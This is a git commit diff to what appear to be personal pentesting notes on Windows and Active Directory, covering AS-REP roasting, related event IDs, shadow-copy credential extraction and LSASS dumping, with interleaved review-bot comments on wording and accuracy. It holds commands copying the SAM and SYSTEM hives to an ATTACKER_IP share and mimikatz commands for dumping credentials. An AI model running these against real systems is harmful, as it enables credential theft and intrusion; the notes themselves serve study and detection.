more info

This commit is contained in:
gurkenhabicht 2026-04-03 21:56:33 +02:00
parent ccaa96dab5
commit c78967a9a9
3 changed files with 24 additions and 11 deletions

View File

@ -1,4 +1,10 @@
# AS-Rep Roating # AS-Rep Roasting
AS-REP Roasting targets account for which preauthentication is disabled.
This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips
the verification step. After event type `4768` the `Pre_Authentication_Type=0`
and event code `4769` and `4624` is never triggered.
A service can be requested without any password check.
AS-Rep Roasting dumps user accounts which did not enable pre-authentication. AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
This is somewhat similar to Kerberoasting but includes user accounts as well. This is somewhat similar to Kerberoasting but includes user accounts as well.
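Review bot: the new line `After event type \`4768\` the \`Pre_Authentication_Type=0\` and event code \`4769\` and \`4624\` is never triggered.` has a number-agreement error ("is" for two event codes) and runs two observations into one sentence; state them separately as what a defender sees: a 4768 (TGT request) with Pre-Authentication Type 0 for the account, followed by no 4769 (service ticket request) and no 4624 (logon) for it, because the roasting attempt never uses the returned ticket. `targets account for which` should read `targets accounts for which`. The added line `A service can be requested without any password check.` is also inaccurate: no service is requested at all (which is exactly why 4769 does not fire); it is the AS-REP, the reply to the TGT request, that the DC hands out without checking the password. Suggest: `A TGT can be requested for such an account without any password check.`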

View File

@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='<Category>';ID='<Event IDs>'} | fl
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows -> * **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
Sysmon -> Operational) Sysmon -> Operational)
* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process
* **4688**: Process Creation (Windows Logs -> Security) * **4688**: Process Creation (Windows Logs -> Security)
### Files ### Files
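Review bot: the added `* **10**: ProcessAccess, ...` bullet omits the log location that the neighbouring bullets give in parentheses (`Applications & Services -> Microsoft -> Windows -> Sysmon -> Operational`); add it for consistency. Since the same commit documents LSASS dumping, it would also help to name the fields that make this event useful for detection: `TargetImage` (the process whose handle was opened, e.g. `lsass.exe`) and `GrantedAccess` (the access mask the handle was opened with).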

View File

@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
### Volume Shadow Copy Service ### Volume Shadow Copy Service
* Take a look at the volumes at Take a look at the volumes at
```sh ```sh
vssadmin list shadows vssadmin list shadows
``` ```
* Copy `sam` and `system` from the shadow copy Copy `sam` and `system` from the shadow copy
```sh ```sh
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
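Review bot: the fenced blocks in this section are tagged `sh`, but `vssadmin list shadows` and `copy \\?\GLOBALROOT\...` are Windows cmd.exe commands, not shell; tag the fences as batch/cmd instead so the highlighting and the reader's expectation about the interpreter match.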
@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys
### Dump LSASS ### Dump LSASS
* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` LSASS contains multiple different credential types like NTLM password hashes,
active krb session tickets, plaintext passwords and cached domain credentials.
* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile`
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
* Extract the dump via mimikatz * Extract the dump via mimikatz
```sh ```sh
privilege::debug privilege::debug
sekurlsa::logonpasswords sekurlsa::logonpasswords
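Review bot: the retained bullet still has `creat dumpfile` (the Task Manager entry is "Create dump file") and `tskmgr.exe` (should be `taskmgr.exe`); since this hunk already corrects `right-clicking`, fix those two in the same pass, along with `sysinternal suite` -> `Sysinternals Suite`. In the new sentence, spell out `krb` as `Kerberos`, and qualify `plaintext passwords`: LSASS holds them only when the WDigest provider is enabled, which is not the default on current Windows versions, so stating it unconditionally overstates what a dump yields.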